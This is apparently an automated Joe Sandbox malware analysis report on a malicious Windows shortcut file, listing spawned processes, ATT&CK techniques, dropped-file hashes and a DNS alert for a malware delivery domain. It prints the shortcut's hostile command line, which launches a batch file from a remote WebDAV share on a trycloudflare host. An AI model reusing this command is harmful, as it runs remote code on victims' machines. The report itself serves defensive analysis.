Windows
Analysis Report
dial2.Ink.lnk
Overview
General Information
Detection
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- cmd.exe (PID: 6704 cmdline: "C:\Windows\System32\cmd.exe" /c start "" /min \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\file.bat & start \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\1.jpg MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- rundll32.exe (PID: 7496 cmdline: "C:\Windows\system32\rundll32.exe" ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile NetworkDiagnosticsSharing C:\Users\user~1\AppData\Local\Temp\NDF1936.tmp MD5: EF3179D498793BF4234F708D3BE28633)
- msdt.exe (PID: 7516 cmdline: -skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\user~1\AppData\Local\Temp\NDF1936.tmp" -ep "NetworkDiagnosticsSharing" MD5: 3AE6BFDF0257B303EDD695DA183C8462)
- netsh.exe (PID: 7856 cmdline: "C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
- cleanup
System Summary |
---|
Source: | Author: frack113, Nasreddine Bencherchali: |
Timestamp: | 05/24/24-11:03:00.227669 |
SID: | 2052731 |
Source Port: | 50669 |
Destination Port: | 53 |
Protocol: | UDP |
Classtype: | A Network Trojan was detected |
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Source: | Joe Sandbox ML: |
Source: | Binary string: |
Networking |
---|
Source: | Snort IDS: |
Source: | DNS traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
System Summary |
---|
Source: | Strings: |
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Process created: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Key value queried: | Jump to behavior |
Source: | LNK file: |
Source: | Automated click: | ||
Source: | File opened: | Jump to behavior |
Source: | Window detected: |
Source: | Binary string: |
Source: | Static PE information: |
Persistence and Installation Behavior |
---|
Source: | Process created: |
Source: | File created: | Jump to dropped file | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Last function: |
Source: | Binary or memory string: |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Key value queried: | Jump to behavior |
Lowering of HIPS / PFW / Operating System Security Settings |
---|
Source: | Process created: |
Stealing of Sensitive Information |
---|
Source: | File opened: | Jump to behavior | ||
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | 1 Non-Application Layer Protocol | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 1 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Rundll32 | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Timestomp | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 12 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | ReversingLabs | |||
9% | Virustotal | Browse | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs | |||
0% | Virustotal | Browse | ||
0% | ReversingLabs | |||
0% | Virustotal | Browse | ||
0% | ReversingLabs | |||
0% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
1% | Virustotal | Browse | ||
0% | Virustotal | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
boy-such-icon-positive.trycloudflare.com | unknown | unknown | true | | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
 | | false | | unknown |
 | | true | | unknown |
 | | true | | unknown |
 | | false | | unknown |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1447085 |
Start date and time: | 2024-05-24 11:02:08 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 6m 49s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 23 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | dial2.Ink.lnk |
Detection: | MAL |
Classification: | mal88.rans.spyw.evad.winLNK@7/16@1/0 |
EGA Information: | Failed |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
- Not all processes were analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
Time | Type | Description |
---|---|---|
05:02:59 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\DiagPackage.dll | Get hash | malicious | Unknown | Browse | ||
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticSnapIn.dll | Get hash | malicious | Unknown | Browse | ||
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\en-GB\DiagPackage.dll.mui | Get hash | malicious | Unknown | Browse | ||
Process: | C:\Windows\System32\cmd.exe |
File Type: | |
Category: | modified |
Size (bytes): | 2812 |
Entropy (8bit): | 2.9032722066306347 |
Encrypted: | false |
SSDEEP: | 24:Fo32Q1YSu+1YSqxqi88888n73qHi88887PqHi8888x+qTqj1G:umMu+M88888t88887B8888D |
MD5: | 36DCB98CF0C2F3529B7E38DD57AAF3CC |
SHA1: | 8898FBF6CAEB89793E076D42A8C8BA2FCA4A0D6B |
SHA-256: | 0AD67BE16A7C0E8C7ED63ECD43EDA71F598B857F0B91318353C979B4F697134E |
SHA-512: | 0AE136EE934038776949B1CDA4C3D043B57AA9EAECCE641389CE4BD90AEF816EA0C923E11EDABDD381FB5B536D2272887AD89E6EDDAEB9A1D7C3621771CB7D74 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 167016 |
Entropy (8bit): | 4.413051981071322 |
Encrypted: | false |
SSDEEP: | 384:X+BeLgtgFgQg7rgZgp3vFD2smEtttbkcL5Of8hj1fVh1f8hWqEfVhnq2fVhMfxhd:XLgtgFgQg7rgZgplP/s |
MD5: | 0606098A37089BDC9D644DEE1CC1CD78 |
SHA1: | CADAE9623A27BD22771BAB9D26B97226E8F2318B |
SHA-256: | 284A7A8525B1777BDBC194FA38D28CD9EE91C2CBC7856F5968E79667C6B62A9D |
SHA-512: | 0711E2FEF9FDE17B87F3F6AF1442BD46B4C86BB61C8519548B89C7A61DFCF734196DDF2D90E586D486A3B33F672A99379E8205C240BD4BCB23625FFB22936443 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 489984 |
Entropy (8bit): | 7.291387835559217 |
Encrypted: | false |
SSDEEP: | 6144:LZC0lEOC2Us6eEyAc0jbJYOjlCLHUZQsxjuaJ7oSEvcdfSc0jbJYOjlCLHUZQ:LZFLUe6vJ/wLIvavyfEvJ/wLI |
MD5: | EF3F72E162CFA6C082007672655CAE8A |
SHA1: | F6BE37340CDED395EF7C3DAB103DE4E061B05806 |
SHA-256: | 5A04D9F78BEF844FEE2FEC65610E12DB59CEFAA63544F3045401597AAE753B3C |
SHA-512: | B63D884525CC747D4DEB1335BF31A27248DD612BE9D8A1F6CA7C5F5A795964AC3B8868994CDE1EC5CD0F4C537E00EC56FB45D5250F3BEC1BFA13EE4AA1F9C52C |
Malicious: | false |
Antivirus: | |
Joe Sandbox View: | |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 951 |
Entropy (8bit): | 5.0857751193503695 |
Encrypted: | false |
SSDEEP: | 24:Qb3DQ7NOepjIAflbfjbgTRmW26S1pGCXGiVd/ZF2GRaesBFw:mDzepZtjBtRRbCUae2q |
MD5: | C25ED2111C6EE9299E6D9BF51012F2F5 |
SHA1: | 2DEFBB5A2758AF744E3DD8AF3A4AA153A28E4713 |
SHA-256: | 8E326EE0475208D4C943D885035058FAD7146BBA02B66305F7C9F31F6A57E81B |
SHA-512: | AAC97463868162FE042748A279C38F6FB569E971E0CC0339D1A8969A7F5633EF7377B6F7DCFAE94BDD2BF96BBFF454B607EE8D7573E1C3C9569269FE82671D9E |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 770 |
Entropy (8bit): | 5.043368661106705 |
Encrypted: | false |
SSDEEP: | 24:Qb3DQ7NcIKGlbfjbgTRmW26S1pGK/KrGFxw:mDl4jBtPKH |
MD5: | 25B8543DBF571F040118423BC3C7A75E |
SHA1: | 49044724698E6964DC93ACF5BEE2A77B8EAD4133 |
SHA-256: | D78E6291D6F27AC6FEBDCF0A4D5A34521E7F033AF8875E026DF21BA7513AB64A |
SHA-512: | EC991FF552C1012209940CDCB081D64876B7989C56F07739B392DAAE9BCABA883B45AA90D50BEF31F276A9CD8492EE2B9DB700CD5E20E7B17BA43D98EC394DF5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 9728 |
Entropy (8bit): | 5.0031830583187595 |
Encrypted: | false |
SSDEEP: | 192:dXcso4xinzRCxtd3wz5AstHq9Y2f0mWjeLNW:dXckCMPGz9ZYWC5W |
MD5: | 502A165A5058F93FA7F84A9FB52887CD |
SHA1: | 43C723564649244A9FB28EDFEC83F0330420CEB1 |
SHA-256: | 818DD25A449FEB9D30A108550940D3729FF1C83A8957049AA5E5EE56C89573DB |
SHA-512: | A3B2B5A5D75DBBA17348FBECE170FB94E1406789724CC35FBDE36CAC55C58310F08E580E3FE5E9D7F306DE4FD579B69704CBD5B43D048CDA0B24CEED37770163 |
Malicious: | false |
Antivirus: | |
Joe Sandbox View: | |
Preview: |
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticsResolve.ps1
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12213 |
Entropy (8bit): | 4.649249749706581 |
Encrypted: | false |
SSDEEP: | 192:eLXYPXsa+OjfI9HIufxAey+3OG78/ce+eT5WjifrM+BK:VPXaifqdfxAey+ecmAu7k |
MD5: | D213491A2D74B38A9535D616B9161217 |
SHA1: | BDE94742D1E769638E2DE84DFB099F797ADCC217 |
SHA-256: | 4662C3C94E0340A243C2A39CA8A88FD9F65C74FB197644A11D4FFCAE6B191211 |
SHA-512: | 5FD8B91B27935711495934E5D7CA14F9DD72BC40A38072595879EF334A47F99E0608087DDC62668C6F783938D9F22A3688C5CDEF3A9AD6C3575F3CFA5A3B0104 |
Malicious: | false |
Preview: |
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticsTroubleshoot.ps1
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 25783 |
Entropy (8bit): | 4.500605198321576 |
Encrypted: | false |
SSDEEP: | 384:blSoNnCiXTShob5bdVTz6rZTvxlBNexTKmh+xdxBUNQGJ:xSoTh8Jq |
MD5: | 2857343E8845EADB9B60CA0727CBDCB7 |
SHA1: | 82A5533B3739504C72F9DCE7D353845B35037DEE |
SHA-256: | 06D927AE1DB217378EA77146FDCCA66D1F1F6D90780B734B8748D1052FBD8B86 |
SHA-512: | 56B09BFBFF32B43DDD8E4636A485AF111B6DBFA2B7181299A22A3D007CF87DF0B09433100DC693C81C4F746A40F42FC51C75436511BE26270B8D84F7AC8EAD7D |
Malicious: | false |
Preview: |
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticsVerify.ps1
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11079 |
Entropy (8bit): | 4.751587059666952 |
Encrypted: | false |
SSDEEP: | 192:YORm9mJWriv3iriv3oyriv3vgriv3qB3b8FnHayrBJckzrSartt0qF+rSG/rSurT:YORm9mJDv33v3oHv3lv3qB3b8FnHrrBA |
MD5: | 9B222D8EC4B20860F10EBF303035B984 |
SHA1: | B30EEA35C2516AFCAB2C49EF6531AF94EFAF7E1A |
SHA-256: | A32E13DA40AC4B9E1DAC7DD28BC1D25E2F2136B61FF93BE943018B20796F15BC |
SHA-512: | 8331337CCB6E3137B01AEEC03E6921FD3B9E56C44FA1B17545AE5C7BFCDD39FCD8A90192884B3A82F56659009E24B63CE7F500E8766FD01E8D4E60A52DE0FE67 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 567 |
Entropy (8bit): | 4.837302167759307 |
Encrypted: | false |
SSDEEP: | 12:QcM3BFN+7bxAPe/LACrfgjvj5s8x8i9OoXdEgnc8x8i9OoXdQIx:Qb3DQ7FMejjbgTNhii9dXDxii9dXOe |
MD5: | A660422059D953C6D681B53A6977100E |
SHA1: | 0C95DD05514D062354C0EECC9AE8D437123305BB |
SHA-256: | D19677234127C38A52AEC23686775A8EB3F4E3A406F4A11804D97602D6C31813 |
SHA-512: | 26F8CF9AC95FF649ECC2ED349BC6C7C3A04B188594D5C3289AF8F2768AB59672BC95FFEFCC83ED3FFA44EDD0AFEB16A4C2490E633A89FCE7965843674D94B523 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 54687 |
Entropy (8bit): | 4.91902609892868 |
Encrypted: | false |
SSDEEP: | 768:AaDgc60FE2UMeV6HQEqEVBWMBaRNdKdNh5BIW6Mk7svkxtFJuAQQW:j0a4bKcW6MkcSuj |
MD5: | C912FAA190464CE7DEC867464C35A8DC |
SHA1: | D1C6482DAD37720DB6BDC594C4757914D1B1DD70 |
SHA-256: | 3891846307AA9E83BCA66B13198455AF72AF45BF721A2FBD41840D47E2A91201 |
SHA-512: | 5C34352D36459FD8FCDA5B459A2E48601A033AF31D802A90ED82C443A5A346B9480880D30C64DB7AD0E4A8C35B98C98F69ECEEDAD72F2A70D9C6CCA74DCE826A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3011 |
Entropy (8bit): | 5.393839415081681 |
Encrypted: | false |
SSDEEP: | 48:mDqbURueqlXC2ay3g+rAgeNTFNe5L9tkYnNn2E8/UBUyuzoth1GlB:mD+UR6XC2az4MjY5L9VnNnIUBUyuzoti |
MD5: | 0C75AE5E75C3E181D13768909C8240BA |
SHA1: | 288403FC4BEDAACEBCCF4F74D3073F082EF70EB9 |
SHA-256: | DE5C231C645D3AE1E13694284997721509F5DE64EE5C96C966CDFDA9E294DB3F |
SHA-512: | 8FC944515F41A837C61A6C4E5181CA273607A89E48FBF86CF8EB8DB837AED095AA04FC3043029C3B5CB3710D59ABFD86F086AC198200F634BFB1A5DD0823406B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 17408 |
Entropy (8bit): | 3.463167967348922 |
Encrypted: | false |
SSDEEP: | 96:40OJmd+VoozojEIjPe/dQTVOd5hvhHyHMVqz+4MEvTLGlyQzwv7KCbVeog3+yt41:40njnexdUMR4wgK+gWlTWy |
MD5: | 42924954580FC0B97147D18CBD9064A2 |
SHA1: | E02B93D36214FB4A98AA9B4711920541C78D5B26 |
SHA-256: | B03FC44FCB28F039F94AC63B44617E04071D1DC5A5CD15E187AA806A085EF31A |
SHA-512: | 0B2737EE5C21538B120FD975850E7899F7F1B8B7FEC49B5E9F807EBFAE62DA3EB333CDBDB65912BACA43B39D63AFBE1258C8C54CC7E8A313D108339778585B73 |
Malicious: | false |
Antivirus: | |
Joe Sandbox View: | |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5378 |
Entropy (8bit): | 3.527173963273437 |
Encrypted: | false |
SSDEEP: | 96:i30smw/9nwbgDwlwn0iYveuQzRYkwj0pD+EijvxFvXG5B9c1rO4L:i30sZYlGe3vGfw |
MD5: | B2780BE67C909635DAEC96B9C909EC54 |
SHA1: | F4A8562D46548CBF091EB5230D2A6A3C5859BA3E |
SHA-256: | 0E7173882297619CE2097133B9D5C69D69B29997C39A5CBC4A88247C580642C5 |
SHA-512: | 8576D3313963A814870995FDE92F739A786ED7F93578F190DE07308E1DD66A8F511D4E06733298A250AAF48B64404DE4F99B03079B97FC33CDC3C798EAD0AFD0 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 48956 |
Entropy (8bit): | 5.103589775370961 |
Encrypted: | false |
SSDEEP: | 768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO |
MD5: | 310E1DA2344BA6CA96666FB639840EA9 |
SHA1: | E8694EDF9EE68782AA1DE05470B884CC1A0E1DED |
SHA-256: | 67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C |
SHA-512: | 62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\netsh.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 116 |
Entropy (8bit): | 4.625060946214589 |
Encrypted: | false |
SSDEEP: | 3:lwFL5WvFN0Ked18SARJOaKWR6WEMYV3Cwv:laWv3ed1/A7OXMICwv |
MD5: | EA30C563F5D70CB0C4232D692B93346E |
SHA1: | F0D28A8CACDFD35B2587F3F673E748100DBC28D6 |
SHA-256: | 569E17E6BB0D00D37BA50D0E63827FB0FBB31785EF75C9920C315EBFDEA4C9A0 |
SHA-512: | F641B6553A2BBAF322DC0DD4650E5E589526736ADE6E5B19A09743113EB603C78CB880DA58495C715BCF2EDA830EEBC2159D4B3F44F66ECC2A97AC416BCB0901 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.5118522866203765 |
TrID: | |
File name: | dial2.Ink.lnk |
File size: | 2'025 bytes |
MD5: | e12f74c1f35c4f7d07f5615757729526 |
SHA1: | 809096004d6255f491f6d477d94d72bd46b9e023 |
SHA256: | d577c12707f3c3c4aed546e08525caf2e24c4cebc8ab1658c6d870c09177bcbf |
SHA512: | 3a9edb1f90765e8f236e8c2fcc5c4f3e6e4277f1d2658188a9410928c4e62dc15b79b5e6d1e338e6eb3c64eecae8fad53e0616c7155bfec0041bcc80e1c730a9 |
SSDEEP: | 48:8EJoWcufOX4jjJ2JXjJ2Keh4UWJBE2Fe7:8uodX43JCzJneOUCBE8e7 |
TLSH: | 5441A6062BFE5B20F7F30F7019B556B59E32789BAA91DB2D4148010E09B4F14EDA4F67 |
File Content Preview: | L..................F.... ....Jx.......}.......}......@......................5....P.O. .:i.....+00.../C:\...................V.1.....GX....Windows.@......./M.1GX.............................!w.W.i.n.d.o.w.s.....Z.1.....SXc7..System32..B......./M.1SXc7...... |
Icon Hash: | 74f0e4e4e4e1e1ed |
General | |
---|---|
Relative Path: | ..\..\..\..\Windows\System32\cmd.exe |
Command Line Argument: | /c start "" /min \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\file.bat & start \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\1.jpg |
Icon location: | \\diatruiest.com@80\sniptool\work\a.ico |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
05/24/24-11:03:00.227669 | UDP | 2052731 | ET TROJAN DNS Query to Malware Delivery Related Domain (boy-such-icon-positive .trycloudflare .com) | 50669 | 53 | 192.168.2.7 | 1.1.1.1 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 24, 2024 11:03:00.227669001 CEST | 50669 | 53 | 192.168.2.7 | 1.1.1.1 |
May 24, 2024 11:03:00.253319025 CEST | 53 | 50669 | 1.1.1.1 | 192.168.2.7 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
May 24, 2024 11:03:00.227669001 CEST | 192.168.2.7 | 1.1.1.1 | 0xe52c | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
May 24, 2024 11:03:00.253319025 CEST | 1.1.1.1 | 192.168.2.7 | 0xe52c | Name error (3) | none | none | A (IP address) | IN (0x0001) | false |
Target ID: | 0 |
Start time: | 05:02:59 |
Start date: | 24/05/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff687c80000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 1 |
Start time: | 05:02:59 |
Start date: | 24/05/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75da10000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 12 |
Start time: | 05:03:12 |
Start date: | 24/05/2024 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff700510000 |
File size: | 71'680 bytes |
MD5 hash: | EF3179D498793BF4234F708D3BE28633 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 13 |
Start time: | 05:03:12 |
Start date: | 24/05/2024 |
Path: | C:\Windows\System32\msdt.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7724f0000 |
File size: | 499'200 bytes |
MD5 hash: | 3AE6BFDF0257B303EDD695DA183C8462 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 17 |
Start time: | 05:03:18 |
Start date: | 24/05/2024 |
Path: | C:\Windows\System32\netsh.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff67c350000 |
File size: | 96'768 bytes |
MD5 hash: | 6F1E6DD688818BC3D1391D0CC7D597EB |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |